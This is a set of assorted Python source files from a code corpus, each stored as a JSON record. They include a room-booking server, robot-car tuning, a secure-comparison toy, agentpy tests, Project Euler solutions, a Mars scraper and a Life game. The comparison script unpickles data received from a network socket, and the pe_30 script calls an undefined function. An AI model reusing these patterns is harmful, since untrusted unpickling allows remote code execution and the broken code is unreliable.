confirmed_reservations.extend(confirmed_missing_reservations)\n\n for res in confirmed_reservations:\n res[\"service\"] = \"libcal\"\n res[\"booking_id\"] = res[\"bookId\"]\n res[\"room_id\"] = res[\"eid\"]\n res[\"gid\"] = res[\"cid\"]\n del res[\"bookId\"]\n del res[\"eid\"]\n del res[\"cid\"]\n del res[\"status\"]\n del res[\"email\"]\n del res[\"firstName\"]\n del res[\"lastName\"]\n\n room_ids = \",\".join(list(set([str(x[\"room_id\"]) for x in confirmed_reservations])))\n if room_ids:\n rooms = studyspaces.get_room_info(room_ids)\n for room in rooms:\n room[\"thumbnail\"] = room[\"image\"]\n del room[\"image\"]\n del room[\"formid\"]\n\n for res in confirmed_reservations:\n room = [x for x in rooms if x[\"id\"] == res[\"room_id\"]][0]\n res[\"name\"] = room[\"name\"]\n res[\"info\"] = room\n del res[\"room_id\"]\n reservations.extend(confirmed_reservations)\n\n return reservations\n\n\ndef save_booking(**info):\n item = StudySpacesBooking(**info)\n\n sqldb.session.add(item)\n sqldb.session.commit()\n","sub_path":"server/studyspaces.py","file_name":"studyspaces.py","file_ext":"py","file_size_in_byte":17047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
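Wharton reservation times arrive as strings such as "2:30 p.m." or "9 a.m.", which is why the code above strips the periods, upper-cases, and falls back from "%I:%M %p" to "%I %p" when no minutes are given. A minimal sketch of that fallback in isolation (the sample strings are invented for the demo):

import datetime

def parse_wharton_time(raw):
    cleaned = raw.replace(".", "").upper()  # "2:30 p.m." -> "2:30 PM"
    try:
        t = datetime.datetime.strptime(cleaned, "%I:%M %p")
    except ValueError:
        t = datetime.datetime.strptime(cleaned, "%I %p")  # no minutes given
    return datetime.datetime.strftime(t, "%H:%M:%S")

assert parse_wharton_time("2:30 p.m.") == "14:30:00"
assert parse_wharton_time("9 a.m.") == "09:00:00"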
+{"seq_id":"225569048","text":"import picar_4wd as fc\nimport part2\nimport time\nimport math\n\nFINE_TUNE_STEP_SIZE = 7.5\nTHRESHOLD = 100 #centimeter\nFINE_TUNE_PWR = part2.TURN_PWR\nFINE_TUNE_TIME = part2.TURN_TIME * (FINE_TUNE_STEP_SIZE/45) #make it turn FINE_TUNE_STEP_SIZE degree each time\n\nclass fineTune():\n def __init__(self, del_dir):\n self.ref_points = []\n self.curr_points = []\n self.del_dir = del_dir\n self.tune_range_degree = abs(del_dir) * 15 # turn 45 degree -> fine tune 15 degree; turn 90 degree -> fine tune 30 degree\n self.tune_range = round(self.tune_range_degree / FINE_TUNE_STEP_SIZE)\n\n def set_ref_points(self):\n ref_angle_dist = part2.get_distances( round(180/FINE_TUNE_STEP_SIZE), get_median = False)\n #ref_angle_dist = [(90, 200), (75,200), (60, 100), (45,110), (30,90), (15, 300), (0, 400), (-15, 400), (-30, 20), (-45, 10), (-60, 100), (-75, 400), (-90, 400)] ############ test #############\n self.ref_points = self._LT_threshold(ref_angle_dist)\n\n def fine_tune(self):\n # each elements in list represents FINE_TUNE_STEP_SIZE degree\n # fine tune +- self.tune_range_degree degree\n is_turn_left = (self.del_dir >= 0)\n curr_angle_dist = part2.get_distances( round(180/FINE_TUNE_STEP_SIZE), get_median = False)\n #curr_angle_dist = [(90, 90), (75,300), (60, 400), (45,400), (30,20), (15, 10), (0, 100), (-15, 400), (-30, 400), (-45, 400), (-60, 20), (-75, 10), (-90, 100)] ############ test ############\n self.curr_points = self._LT_threshold(curr_angle_dist)\n print(self.ref_points)\n print(self.curr_points)\n\n if is_turn_left == True:\n lhs = self.curr_points\n rhs = self.ref_points\n else:\n lhs = self.ref_points\n rhs = self.curr_points\n\n ideal_del_i = (abs(self.del_dir) * round(45/FINE_TUNE_STEP_SIZE)) #del_dir = 1 -> 45 degree, displacement = 45/15 = 3\n relevance_list = []\n for del_i in range( ideal_del_i - self.tune_range, ideal_del_i + self.tune_range + 1):\n relevance = self._cal_relevance(lhs, rhs, del_i)\n #relevance -= math.sqrt(abs(del_i - ideal_del_i)) ##### test #####\n relevance_list.append(relevance)\n print(relevance_list)\n fine_tune_displacement = self._get_fine_tune_displacement(relevance_list)\n \n if is_turn_left:\n fine_tune_degree = (-1)*fine_tune_displacement*FINE_TUNE_STEP_SIZE\n else:\n fine_tune_degree = fine_tune_displacement*FINE_TUNE_STEP_SIZE\n print(\"fine tune \" + str(fine_tune_degree) + \" degree\")\n \n # fine_tune_displacement > 0 means overturned, need turn back\n if (is_turn_left and fine_tune_displacement > 0) or (not is_turn_left and fine_tune_displacement < 0):\n fc.turn_right(FINE_TUNE_PWR)\n else:\n fc.turn_left(FINE_TUNE_PWR)\n time.sleep(FINE_TUNE_TIME * abs(fine_tune_displacement))\n fc.stop() \n\n def _LT_threshold(self, target_list):\n res = []\n for angle, dist in target_list:\n if dist >= THRESHOLD:\n res.append(0)\n else:\n res.append(1)\n return res\n\n def _cal_relevance(self, lhs, rhs, del_i):\n rel = 0\n list_len = len(lhs)\n for i in range(list_len - del_i):\n if lhs[del_i + i] == rhs[i]:\n rel += 1\n else:\n rel -= 0.5\n\n return rel\n\n def _get_fine_tune_displacement(self, relevance_list):\n max_relevance_index = self.tune_range\n max_relevance = relevance_list[self.tune_range]\n for i in range(2*self.tune_range + 1):\n if relevance_list[i] > max_relevance:\n max_relevance_index = i\n max_relevance = relevance_list[i]\n return max_relevance_index - 
self.tune_range\n","sub_path":"lab1_code/fineTuneOrient.py","file_name":"fineTuneOrient.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
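The fine-tuning above is essentially a shifted-match score between two binary obstacle maps: +1 for each agreeing cell, -0.5 for each disagreement, evaluated at every candidate shift, with the best-scoring shift chosen as the correction. A toy run of the same scoring rule outside the class (the scan values are invented):

def cal_relevance(lhs, rhs, del_i):
    # same scoring as fineTune._cal_relevance
    rel = 0
    for i in range(len(lhs) - del_i):
        rel += 1 if lhs[del_i + i] == rhs[i] else -0.5
    return rel

ref = [0, 0, 1, 1, 0, 0]    # thresholded scan before the turn
curr = [0, 0, 0, 0, 1, 1]   # same scene as seen after turning by two steps
print([cal_relevance(curr, ref, d) for d in range(4)])
# [0.0, 2.0, 4, 1.5] -> the best score lands at shift 2, as expected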
+{"seq_id":"8366962","text":"#!/usr/bin/env python3\n\"\"\"\nLaunch a python shell\n\nTry to launch ipthon or bpython. Fall back to the\nstandard python interpreter.\n\"\"\"\n\nimport services\n\n\ndef start_ipython(user_ns={}):\n \"\"\"Start the ipython shell\"\"\"\n from IPython import start_ipython\n start_ipython(argv=[], user_ns=user_ns)\n\n\ndef start_bpython(locals_={}):\n \"\"\"Start the bpython shell\"\"\"\n from bpython import embed\n embed(locals_=locals_)\n\n\ndef start_fallback(local={}):\n \"\"\"Start the fallback interpreter\"\"\"\n from code import interact\n interact(local=local)\n\n\ndef start_shell(local={}):\n \"\"\"\n Start a python shell\n \"\"\"\n shells = [start_ipython, start_bpython, start_fallback]\n for shell in shells:\n try:\n shell(local)\n except ImportError:\n pass # try next\n else:\n return\n\n\ndef console(args):\n \"\"\"\n Start the API console\n \"\"\"\n host = \"localhost:2344\"\n\n services.init(host)\n start_shell(services.__dict__)\n\n\nif __name__ == \"__main__\":\n console(None)\n","sub_path":"console/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"336197813","text":"from functools import lru_cache\r\n\r\ndef korita(n, m, l):\r\n if n == 0:\r\n return 0\r\n if l > n: \r\n return 0\r\n counter = 0\r\n if m * (l + 1) <= n:\r\n counter += 1 + korita(n - m, m - 1, l)\r\n return counter\r\n\r\nprint(korita(9, 3, 2))","sub_path":"vaje/korita.py","file_name":"korita.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"359784935","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport itertools\n\ndef consists_of(n, digits):\n return sorted(n) == map(str, digits)\n\ndef sum_of_fifths_pow_str(digits):\n res = str(sum(map(lambda x:x**5, digits)))\n res = (6-len(res))*'0' + res\n return res\n\ndef main():\n result = 0\n digits = range(10)*6\n for d in itertools.combinations_with_replacement(range(10), r=6):\n val = sum_of_fifths(d)\n if consists_of(val, d):\n print(d, val)\n result += int(val)\n print(result-1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pe_30.py","file_name":"pe_30.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"114584656","text":"#coding=utf-8\n\n\"\"\"\nvalid_keys 表示 json keys 映射到 t_shixin_valid 相应的columns\n\nvalid_columns 对应 t_shixin_valid 的columns\ninvalid_columns 对应 t_shixin_invalid 的columns\n\"\"\"\n\nvalid_keys = {\n 'id': 'sys_id',\n 'iname': 'name',\n 'age': 'age',\n 'sexy': 'sex',\n 'cardNum':'card_num',\n 'businessEntity': 'business_entity',\n 'areaName': 'area_name',\n 'caseCode': 'case_code',\n 'regDate': 'reg_date',\n 'publishDate': 'publish_date',\n 'gistId': 'gist_id',\n 'courtName': 'court_name',\n 'gistUnit': 'gist_unit',\n 'duty': 'duty',\n 'performance': 'performance',\n 'disruptTypeName': 'disrupt_type_name',\n 'partyTypeName': 'party_type_name'\n}\n\nvalid_columns = valid_keys.values()\nvalid_columns.append('flag')\n\ninvalid_columns = ('sys_id', 'err_type')\n\n\n","sub_path":"current/shixin_spider/configuration/columns_cfg.py","file_name":"columns_cfg.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"39962972","text":"def mymax(a, b):\n if a > b:\n return a\n else:\n return b\n\n\ndef test_mymax(test_data, test_result, test_id):\n if mymax(test_data[0], test_data[1]) == test_result:\n print(\"%s is correct\" % test_id)\n else:\n print(\"%s failed!\" % test_id)\n\n\nif __name__ == '__main__':\n lista1 = [1, 5]\n lista2 = [6, 1]\n lista3 = [10, 10]\n\n test_mymax(lista1, 5, \"Test 1\")\n test_mymax(lista2, 6, \"Test 2\")\n test_mymax(lista3, 10, \"Test 3\")\n","sub_path":"simple46exercises/simple/zadanie1.py","file_name":"zadanie1.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"350265479","text":"from Messages.Message import Message\n\n\nclass BOSCO:\n\n name = \"BOSCO Protocol\"\n\n def __init__(self, **kargs):\n self.env = kargs[\"env\"]\n self.pki = kargs[\"pki\"]\n self.pki.register(self)\n self.input = None\n\n def run_node(self):\n round = self.env.get_round()\n myid = self.env.get_id(self)\n flag = 0\n if round == 0:\n self.input = self.env.get_input(myid)\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n else:\n if flag:\n self.env.get_input_msgs(self)\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n else:\n msgs = self.env.get_input_msgs(self)\n d = {}\n for msg in msgs:\n if(not self.pki.verify(msg)):\n raise RuntimeError\n key = msg.get_extraction()\n if key not in d:\n d[key] = 0\n d[key] = d[key]+1\n if not d:\n raise RuntimeError\n d_sorted = sorted(\n d.items(), key=lambda kv: kv[1], reverse=True)\n if(d_sorted[0][1] >= (self.env.get_n()-self.env.get_f())):\n self.env.put_output(self, d_sorted[0][0])\n self.input = d_sorted[0][0]\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n elif (d_sorted[0][1] > (self.env.get_n()-self.env.get_f())/2):\n if len(d_sorted) > 1 and d_sorted[1][1] > (self.env.get_n()-self.env.get_f())/2:\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n else:\n self.input = d_sorted[0][0]\n self.env.put_broadcast(self, self.pki.sign(\n self, Message(myid, self.input)))\n","sub_path":"src/Protocols/BOSCO.py","file_name":"BOSCO.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"119161242","text":"\n# disclaimer: this code was written for testing and self-learning, do\n# not use in any serious application, do not expect any serious security!\nimport socket, sys, logging, hashlib, random, json, sympy, pickle\n\n# global settings - make sure those are consistent\nNBITS=32 # increase this is comparing worth with Jeff Bezos or Mark Zuckerberg\n\n# we work modulo this prime\nP = (1<<510)+15 # yes it happens to be prime\n\nSECURITY=512\n\n# setup logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s')\nLOG = logging.getLogger(__name__)\n\n# utility - wait for connection on port, or connect to host:port\ndef interact(info):\n info = info.split(':')\n\n if len(info) == 1:\n port = int(info[0])\n LOG.info('listening on port %d', port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n sock.bind( ('localhost', port) )\n sock.listen(1)\n connection, client_address = sock.accept()\n LOG.info('Client connected from %s', client_address)\n\n return connection\n\n else:\n host, port = info[0], int(info[1])\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n LOG.info('connecting to %s:%d', host, port)\n sock.connect( (host,port) )\n LOG.info('connected!')\n return sock\n\n\n# compute 'ups', they are values that are bigger than a, and will intercept a bigger value of the other party\n# for each i, if the i-th bit is 0, set it to 1 and clear lower bits\ndef s_up(a, n=NBITS):\n return { (a - (a & ((1<>i) & 1 == 0 }\n\n# compute 'downs', they are values that are smaller than a, and will intercept a smaller value of the other party\n# for each i, if the i-th bit is 1, clear lower bits\ndef s_down(a, n=NBITS):\n return { (a - (a & ((1<>i) & 1 == 1 }\n\n# random integer of 512 bits\ndef rand512():\n return random.getrandbits(512)\n\n# return the sha512, as an integer\ndef sha512(s):\n return int.from_bytes(hashlib.sha512(s.encode()).digest(), byteorder='big')\n\ndef hashes(s, n=NBITS):\n return [*(sha512(str(x)) for x in s), *(rand512() for i in range(n-len(s)))]\n\n\n# compute x^e, b y repeated squaring, modulo p\ndef modpow(x, e, p=P):\n r, t = ((x % p) if (e & 1) else 1), x\n e >>= 1\n while e:\n t = (t * t) % p\n if e & 1:\n r = (r * t) % p\n e >>= 1\n return r\n\n# compute a number relatively prime to b, that is,\n# a number r so that r, b have no common factor\ndef rand_coprime(b):\n while True:\n r = random.randint(b // 4, b)\n if sympy.gcd(r, b) == 1:\n return r\n\nif len(sys.argv) != 3:\n print('Usage: prog.py number_to_compare [host:]port (if host is specified connect, otherwise listen and wait)')\n sys.exit()\n \nval = int(sys.argv[1])\nif (val >> NBITS) != 0:\n print('Congratulations, you own many billions, and', NBITS, 'bits are not enough for you!')\n print('You will have to up the NBITS parameter, and the other party too for this to work.')\n sys.exit()\n\nLOG.info('will compare the provided value with a private remote number')\n\nLOG.info('computing my downs/ups, plus padding to hide their sizes')\nmy_downs = hashes(s_down(val))\nmy_ups = hashes(s_up(val))\n\nLOG.info('generating a private key')\nmy_key = rand_coprime(P-1)\n\nLOG.info('encrypting and shuffling my downs/ups')\nM_my_downs = [modpow(x, my_key) for x in my_downs]\nM_my_ups = [modpow(x, my_key) for x in my_ups]\nrandom.shuffle(M_my_downs)\nrandom.shuffle(M_my_ups)\n\n# listen or connect to host:port\nc = interact(sys.argv[2])\n\nLOG.info('sending my downs/ups encrypted with my 
key...')\nc.sendall(pickle.dumps([M_my_downs, M_my_ups]))\nH_his_downs, H_his_ups = pickle.loads(c.recv(2*SECURITY*NBITS//8*3))\nLOG.info('...received his downs/ups encrypted with his key')\n\nLOG.info('bi-encrypting (with my key) and shuffling his downs/ups')\nHM_his_downs = [modpow(x, my_key) for x in H_his_downs]\nHM_his_ups = [modpow(x, my_key) for x in H_his_ups]\nrandom.shuffle(HM_his_downs)\nrandom.shuffle(HM_his_ups)\n\nLOG.info('sending his bi-encrypted downs/ups...')\nc.sendall(pickle.dumps([HM_his_downs, HM_his_ups]))\nHM_my_downs, HM_my_ups = pickle.loads(c.recv(2*SECURITY*NBITS//8*3))\nLOG.info('...received my bi-encrypted downs/ups')\n\nLOG.info('n. insections of my_downs and his_ups: %d (is my_value > his_value?)',\n len(set(HM_my_downs) & set(HM_his_ups)))\nLOG.info('n. insections of my_ups and his_downs: %d (is his_value > my_value?)',\n len(set(HM_my_ups) & set(HM_his_downs)))\n","sub_path":"millionaires_old.py","file_name":"millionaires_old.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
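The protocol rests on modular exponentiation being a commutative cipher: encrypting with my key and then the other party's key yields the same value as the reverse order, so the bi-encrypted sets can be intersected without either side revealing its elements. A tiny self-check of that property with a small prime and arbitrarily chosen exponents:

# E_a(E_b(x)) == E_b(E_a(x)): both equal x**(a*b) mod p
p = 101
a, b = 7, 11              # both coprime to p - 1 = 100, as rand_coprime ensures
for x in (2, 3, 42):
    assert pow(pow(x, a, p), b, p) == pow(pow(x, b, p), a, p)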
+{"seq_id":"446337392","text":"import pytest\r\nimport agentpy as ap\r\nimport numpy as np\r\n\r\n\r\ndef test_repr():\r\n model = ap.Model()\r\n model.add_agents()\r\n model.add_env()\r\n assert model.agents.__repr__() == \"AgentList [1 agent]\"\r\n assert model.envs.__repr__() == \"EnvList [1 environment]\"\r\n assert model.objects.__repr__() == \"ObjList [2 objects]\"\r\n l1 = model.agents.id\r\n l2 = l1 + 1\r\n assert l1.__repr__() == \"AttrList of 'id': [1]\"\r\n assert l2.__repr__() == \"AttrList: [2]\"\r\n\r\n\r\ndef test_call():\r\n class MyAgent(ap.Agent):\r\n def method(self):\r\n if self.id == 2:\r\n self.model.agents[2].delete()\r\n self.model.called.append(self.id)\r\n\r\n model = ap.Model()\r\n model.called = []\r\n model.add_agents(4, MyAgent)\r\n model.agents.call('method', check_alive=True)\r\n assert model.called == [1, 2, 4]\r\n\r\n model = ap.Model()\r\n model.called = []\r\n model.add_agents(4, MyAgent)\r\n model.agents.method()\r\n assert model.called == [1, 2, 3, 4]\r\n\r\n\r\ndef test_attr_calls():\r\n model = ap.Model()\r\n model.add_agents(2)\r\n model.agents.x = 1\r\n model.agents.f = lambda: 2\r\n assert list(model.agents.x) == [1, 1]\r\n assert list(model.agents.f()) == [2, 2]\r\n with pytest.raises(AttributeError):\r\n assert list(model.agents.y) # Convert to list to call attribute\r\n with pytest.raises(TypeError):\r\n assert model.agents.x() # noqa\r\n\r\n\r\ndef test_select():\r\n \"\"\" Select subsets with boolean operators. \"\"\"\r\n model = ap.Model()\r\n model.add_agents(3)\r\n selection1 = model.agents.id == 2\r\n selection2 = model.agents.id != 2\r\n selection3 = model.agents.id < 2\r\n selection4 = model.agents.id > 2\r\n selection5 = model.agents.id <= 2\r\n selection6 = model.agents.id >= 2\r\n assert selection1 == [False, True, False]\r\n assert selection2 == [True, False, True]\r\n assert selection3 == [True, False, False]\r\n assert selection4 == [False, False, True]\r\n assert selection5 == [True, True, False]\r\n assert selection6 == [False, True, True]\r\n assert list(model.agents.select(selection1).id) == [2]\r\n\r\n\r\ndef test_random():\r\n \"\"\" Test random shuffle and selection. \"\"\"\r\n model = ap.Model()\r\n model.add_agents(2)\r\n assert len(model.agents) == len(model.agents.shuffle())\r\n assert len(model.agents.random()) == 1\r\n\r\n # Custom generator with seperate seed\r\n model = ap.Model()\r\n model.add_agents(5)\r\n generator = np.random.default_rng(1)\r\n assert len(model.agents.random(generator=generator)) == 1\r\n assert model.agents.random(generator=generator).id[0] == 3\r\n assert list(model.agents.shuffle(generator=generator).id) == [5, 1, 3, 2, 4]\r\n\r\n # Test with single agent\r\n model = ap.Model()\r\n agents = model.add_agents(1)\r\n assert model.agents.random()[0] is agents[0]\r\n assert model.agents.shuffle()[0] is agents [0]\r\n\r\n # Agentlist with no model defined directly\r\n model = ap.Model()\r\n agents = model.add_agents(3)\r\n agents = ap.AgentList(agents)\r\n model.run(steps=0, seed=1, display=False)\r\n assert agents.random()[0].id == 2\r\n\r\n # Agentlist with no model defined\r\n # (no seed control without model, test can only check if no errors)\r\n agents1 = ap.AgentList([1, 2, 3])\r\n agents1.random()\r\n\r\n\r\ndef test_sort():\r\n \"\"\" Test sorting method. 
\"\"\"\r\n model = ap.Model()\r\n model.add_agents(2)\r\n model.agents[0].x = 1\r\n model.agents[1].x = 0\r\n model.agents.sort('x')\r\n assert list(model.agents.x) == [0, 1]\r\n assert list(model.agents.id) == [2, 1]\r\n\r\n\r\ndef test_arithmetics():\r\n \"\"\" Test arithmetic operators \"\"\"\r\n\r\n model = ap.Model()\r\n model.add_agents(3)\r\n agents = model.agents\r\n\r\n agents.x = 1\r\n assert agents.x.attr == \"x\"\r\n assert list(agents.x) == [1, 1, 1]\r\n\r\n agents.y = ap.AttrList([1, 2, 3])\r\n assert list(agents.y) == [1, 2, 3]\r\n\r\n agents.x = agents.x + agents.y\r\n assert list(agents.x) == [2, 3, 4]\r\n\r\n agents.x = agents.x - ap.AttrList([1, 1, 1])\r\n assert list(agents.x) == [1, 2, 3]\r\n\r\n agents.x += 1\r\n assert list(agents.x) == [2, 3, 4]\r\n\r\n agents.x -= 1\r\n assert list(agents.x) == [1, 2, 3]\r\n\r\n agents.x *= 2\r\n assert list(agents.x) == [2, 4, 6]\r\n\r\n agents.x = agents.x * agents.x\r\n assert list(agents.x) == [4, 16, 36]\r\n\r\n agents.x = agents.x / agents.x\r\n assert list(agents.x)[0] == pytest.approx(1.)\r\n\r\n agents.x /= 2\r\n assert list(agents.x)[0] == pytest.approx(0.5)\r\n","sub_path":"tests/test_lists.py","file_name":"test_lists.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"56057105","text":"# A positive fraction whose numerator is less than its denominator is\n# called a proper fraction.\n# For any denominator, d, there will be d−1 proper fractions; for example,\n# with d = 12:\n# 1/12, 2/12, 3/12, 4/12, 5/12, 6/12, 7/12, 8/12, 9/12, 10/12, 11/12.\n# \n# We shall call a fraction that cannot be cancelled down a resilient fraction.\n# Furthermore we shall define the resilience of a denominator, R(d), to be the\n# ratio of its proper fractions that are resilient; for example, R(12) = 4/11.\n# In fact, d = 12 is the smallest denominator having a resilience R(d) < 4/10.\n# \n# Find the smallest denominator d, having a resilience R(d) < 15499/94744.\n\n# THEORY:\n# \n# If phi(n) is Euler's totient function, then R(d) = phi(d) / (d - 1).\n# If d = p1 * p2 * p3 * ... * pk, with all primes p distinct,\n# then R(d) = ((p1 - 1) * ... * (pk - 1)) / ((p1 * ... * pk) - 1).\n# Multiplying d by a prime p that it's already divisible by results in the\n# numerator and the left half of the denominator both being multiplied by p.\n# \n# This means that to minimize R(d), d should first be set equal to a product\n# of distinct primes D, and then be set equal to multiples of D until the -1\n# in the denominator ceases to be significant.\n\nfrom time import time\nimport sys\nsys.path.append(\"../Library\")\nfrom peresult import peresult\nfrom primefns import primesbelow\n\ndef solve(cap = 15499/94744):\n start = time()\n primes = primesbelow(100) # Safe overestimate\n numerator = 1\n n = 1\n for p in primes:\n if (numerator * (p - 1)) / (n * p - 1) > cap:\n numerator *= p - 1\n n *= p\n else:\n for mult in range(1, p):\n if (numerator * mult) / (n * mult - 1) < cap:\n result = n * mult\n break\n break\n else: # Loop fell through. Primes list wasn't long enough\n raise RuntimeError(\"Primes list in code too short. Edit and extend\")\n peresult(243, result, time() - start)\n\nif __name__ == \"__main__\":\n solve()\n","sub_path":"Problems 201-300/pe243Resilience.py","file_name":"pe243Resilience.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"46368736","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport pandas as pd\n\n\ndef init_browser():\n executable_path = {'executable_path': ChromeDriverManager().install()}\n return Browser('chrome', **executable_path, headless=False)\n\n\ndef scrape():\n # ## NASA Mars News\n url = 'https://redplanetscience.com'\n browser = init_browser()\n browser.visit(url)\n html = browser.html\n soup = bs(html, 'html.parser')\n\n results = soup.find_all(\"div\", class_=\"content_title\")\n content_titles = []\n for result in results:\n content_titles.append(result.text)\n\n results = soup.find_all(\"div\", class_=\"article_teaser_body\")\n content_para = []\n for result in results:\n content_para.append(result.text)\n\n content = []\n for i in range(len(results)):\n content.append({'title': content_titles[i], 'para': content_para[i]})\n mongo_collection = {'contents': content,\n 'featured_image_url': '',\n 'hemisphere': ''\n }\n\n# ## JPL Mars Space Images - Featured Image\n\n url = 'https://spaceimages-mars.com/'\n browser.visit(url)\n\n links_found = browser.links.find_by_partial_text('FULL IMAGE')\n for link in links_found:\n print(link[\"href\"])\n featured_image_url = link[\"href\"]\n mongo_collection['featured_image_url'] = featured_image_url\n\n url = 'https://galaxyfacts-mars.com'\n tables = pd.read_html(url)\n\n df = tables[1]\n df.to_html('MarsFacts.html')\n\n # ## Mars Hemispheres\n\n url = 'https://marshemispheres.com/'\n browser.visit(url)\n\n links = browser.links.find_by_partial_text('Hemisphere Enhanced')\n for link in links:\n print(link['href'])\n\n hemisphere_image_urls = []\n for i in range(len(links)):\n browser.links.find_by_partial_text('Hemisphere Enhanced')[i].click()\n link_img = browser.links.find_by_partial_text('Original')\n soup = bs(browser.html, 'html.parser')\n title = soup.find('h2', class_='title').text.replace(\" Enhanced\", \"\")\n hemisphere_image_urls.append(\n {\"title\": title, \"img_url\": link_img[\"href\"]})\n browser.links.find_by_partial_text('Back').click()\n mongo_collection['hemisphere'] = hemisphere_image_urls\n\n return mongo_collection\n","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"609909755","text":"\"\"\"\nconway.py\nAuthor: Christopher Lee\nCredit: \nAssignment:\nWrite and submit a program that plays Conway's Game of Life, per \nhttps://github.com/HHS-IntroProgramming/Conway-Life\n\"\"\"\n#==================================IMPORTS======================================\nfrom ggame import *\nfrom math import floor\n#==============================COLORS_AND_LINES=================================\nblack = Color(0, 1)\nwhite = Color(0xffffff, 1)\npink = Color(0xFF0097, 1)\nblue = Color(0x00B6FF, 1)\nline = LineStyle(1, white)\nblackline = LineStyle(0.1, black)\nc = {}\ncc = []\n#================================IMPORTANT======================================\n'''gridnumber is the number of cells that there are for each row\nRecommended is 20. Max is 30 before program starts to slow'''\n#gridnumber = 20\ngridnumber = int(input('''How many cells would you like each row to have?\nRecommended is 20 cells.\nMax is 30 cells before program starts to slow.\n'''))\n#Scales screen based on gridnumber\nScreenWidth = gridnumber * 100\nScreenHeight = gridnumber * 100\n#=================================CLASSES=======================================\nclass grid(Sprite):\n g = RectangleAsset(50, 50, blackline, white)\n def __init__(self, position):\n super().__init__(grid.g, position)\n self.visible = True\nclass cell(Sprite):\n cc = RectangleAsset(50, 50, blackline, blue)\n def __init__(self, position):\n super().__init__(cell.cc, position)\n self.visible = False\nclass deadcell(Sprite):\n dc = RectangleAsset(50, 50, blackline, pink)\n def __init__(self, position):\n super().__init__(deadcell.dc, position)\n self.visible = False\n#================================CREATES GRID===================================\ndef row(x):\n xx = x\n y = 0\n for i in range(gridnumber):\n grid((xx, y))\n cell((xx, y))\n deadcell((xx, y))\n y += 50\n#----------------------------------RULES----------------------------------------\ndef rules():\n print('''\nRULES: \n1. Any live cell with fewer than two live neighbors dies, as if by underpopulation.\n\n2. Any live cell with two or three live neighbors lives on to the next generation.\n\n3. Any live cell with more than three live neighbors dies, as if by overpopulation.\n\n4. 
Any dead cell with exactly three live neighbors becomes a live cell, as if by reproduction.\n\nHOW TO PLAY:\n- Click where you want to add a cell to the grid\n\n- Press R to move to the next generation or start or stop the program\n\n- Press C to reset / clear the grid (not fully working)\n\n- Press S to print the cell's status\n\n- Comment out line 149 and line 151 if you want the steps to be automatic\n''')\n#==============================RUNNING_PROGRAM==================================\nclass map(App):\n def __init__(self, width, height):\n super().__init__(width, height)\n self.go = False\n rules()\n x = 0\n for i in range(gridnumber):\n row(x)\n x += 50\n map.listenKeyEvent('keydown', 'r', self.r)\n map.listenKeyEvent('keydown', 'c', self.c)\n map.listenKeyEvent('keydown', 's', self.s)\n map.listenMouseEvent('click', self.mouse)\n#----------------------------------STEP_FUNC------------------------------------\n def step(self):\n if self.go == True:\n age = 0\n coordlist = []\n for (xc, yc) in cc:\n coordlist.append((xc, yc))\n check = []\n for (xc, yc) in coordlist:\n for x in range(xc - 50, xc + 100, 50):\n if x <= ScreenWidth and x >= 0:\n for y in range(yc - 50, yc + 100, 50):\n if y <= ScreenHeight and y >= 0 and (x, y) not in check:\n check.append((x, y))\n for (xc, yc) in check:\n exist = 0\n neighbor = []\n for x in range(xc - 50, xc + 100, 50):\n if x <= ScreenWidth and x >= 0:\n for y in range(yc - 50, yc + 100, 50):\n if y <= ScreenHeight and y >= 0:\n neighbor.append((x, y))\n neighbor.remove((xc, yc))\n for (xcoord, ycoord) in neighbor:\n if (xcoord, ycoord) in coordlist:\n exist += 1\n if exist == 3 and (xc, yc) not in coordlist:\n c[(xc, yc)] = 'a'\n cell((xc, yc)).visible = True\n cc.append((xc, yc))\n elif (xc, yc) in coordlist:\n if exist == 2 or exist == 3:\n if age % 2 != 0:\n c[(xc, yc)] = 'a'\n cell((xc, yc)).visible = True\n if age % 2 == 0:\n c[(xc, yc)] = 'a'\n deadcell((xc, yc)).visible = True\n else:\n c[(xc, yc)] = 'd'\n grid((xc, yc)).visible = True\n del c[(xc, yc)]\n cc.remove((xc, yc))\n age += 1\n '''\n for coord in 